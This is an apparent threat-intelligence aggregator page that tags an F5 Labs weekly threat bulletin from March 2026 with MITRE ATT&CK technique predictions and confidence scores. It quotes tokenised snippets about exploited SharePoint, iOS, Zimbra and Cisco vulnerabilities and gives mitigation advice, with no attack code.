TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

F5 Labs

Weekly Threat Bulletin – March 25th, 2026

2026-03-25 · Read original ↗

ATT&CK techniques detected

17 predictions
T1190Exploit Public-Facing Application
98%
“_ kit _ steals _ iphone / cisa warns of active exploitation of microsoft sharepoint vulnerability ( cve - 2026 - 20963 ) cve - 2026 - 20963, a remote code execution ( rce ) vulnerability affecting microsoft sharepoint, is currently under active exploitation. the us cybersecurity …”
T1190Exploit Public-Facing Application
92%
“##e - 2026 - 20963 - exploited / https : / / www. hendryadrian. com / cisa - warns - of - attacks - exploiting - recent - sharepoint - vulnerability / https : / / www. theregister. com / 2026 / 03 / 19 / unknown _ attackers _ exploit _ yet _ another / ransomware gang exploits cis…”
T1556.006Multi-Factor Authentication
87%
“phishing - resistant multi - factor authentication ( mfa ), such as fido2 or webauthn, for all user - facing applications, especially for externally accessible services like webmail, to mitigate the risk of credential and session theft. - conduct a strategic review of the organiz…”
T1190Exploit Public-Facing Application
86%
“service account and application pool identity permissions, ensuring they have the absolute minimum privileges required to function and cannot access non - essential systems or data. - review and strengthen the existing patch management policy to enforce shorter deployment timelin…”
T1068Exploitation for Privilege Escalation
76%
“), culminating in local privilege escalation through a kernel - mode race condition ( cve - 2025 - 43520 ). successful compromises deploy malware families such as ghostknife ( a javascript backdoor for data exfiltration and device control ), ghostsaber ( a javascript backdoor for…”
T1190Exploit Public-Facing Application
73%
“only permit access from authorized administrator workstations. - establish and enforce a patch management policy that defines specific service - level agreements ( slas ) for identifying, testing, and deploying critical security updates for network infrastructure devices like uni…”
T1204.002Malicious File
56%
“files and endpoint data for the ghostknife, ghostsaber, and ghostblade malware families. compliance best practices - establish and enforce a formal mobile device patch management policy that mandates the installation of security updates for all corporate and byod ios devices with…”
T1588.006Vulnerabilities
52%
“access trojan, has claimed responsibility for attacks on entities such as davita, kettering health, the texas tech university system, and the city of saint paul, minnesota, and has recently deployed a new malware strain called slopoly. this incident follows several other cisco ze…”
T1588.006Vulnerabilities
46%
“/ threat - intelligence / darksword - ios - exploit - chain / https : / / cyberpress. org / new - ios - exploit - uses - advanced - iphone - hacking / https : / / gbhackers. com / new - ios - exploit - uses - advanced - iphone - hacking - tools / https : / / thecyberexpress. com …”
T1566.002Spearphishing Link
46%
“the html body of a single email, disguised as a routine internship inquiry, rather than utilizing malicious attachments or links. upon opening the email in an active zimbra session, the code silently executed in the victim ' s browser, enabling the attackers to harvest sensitive …”
T1587.004Exploits
45%
“weekly threat bulletin – march 25th, 2026 the proliferation of darksword : ios exploit chain adopted by multiple threat actors a new ios full - chain exploit, dubbed darksword, has been identified, leveraging six zero - day vulnerabilities to fully compromise devices running ios …”
T1204.002Malicious File
41%
“weekly threat bulletin – march 25th, 2026 the proliferation of darksword : ios exploit chain adopted by multiple threat actors a new ios full - chain exploit, dubbed darksword, has been identified, leveraging six zero - day vulnerabilities to fully compromise devices running ios …”
T1204.002Malicious File
38%
“/ threat - intelligence / darksword - ios - exploit - chain / https : / / cyberpress. org / new - ios - exploit - uses - advanced - iphone - hacking / https : / / gbhackers. com / new - ios - exploit - uses - advanced - iphone - hacking - tools / https : / / thecyberexpress. com …”
T1190Exploit Public-Facing Application
38%
“network application ecosystem. the most severe, cve - 2026 - 22557, is a path traversal vulnerability rated 10. 0 cvss, allowing unauthenticated attackers to access and manipulate underlying system files without prior privileges or user interaction, potentially leading to full co…”
T1190Exploit Public-Facing Application
33%
“fmc. html https : / / www. hendryadrian. com / interlock - ransomware - leveraged - cisco - fmc - zero - day - 36 - days - before - patch / https : / / www. hendryadrian. com / ransom - delta - manufacturing - mar - 2026 / https : / / www. hendryadrian. com / ransom - elliott - l…”
T1587.004Exploits
32%
“to ensure a timely and complete restoration of critical systems in the event of a successful ransomware attack. - develop and implement a formal vulnerability management program that includes rapid risk assessment and defined service - level agreements ( slas ) for patching criti…”
T1588.006Vulnerabilities
30%
“fmc. html https : / / www. hendryadrian. com / interlock - ransomware - leveraged - cisco - fmc - zero - day - 36 - days - before - patch / https : / / www. hendryadrian. com / ransom - delta - manufacturing - mar - 2026 / https : / / www. hendryadrian. com / ransom - elliott - l…”

Summary

These are the top threats you should know about this week.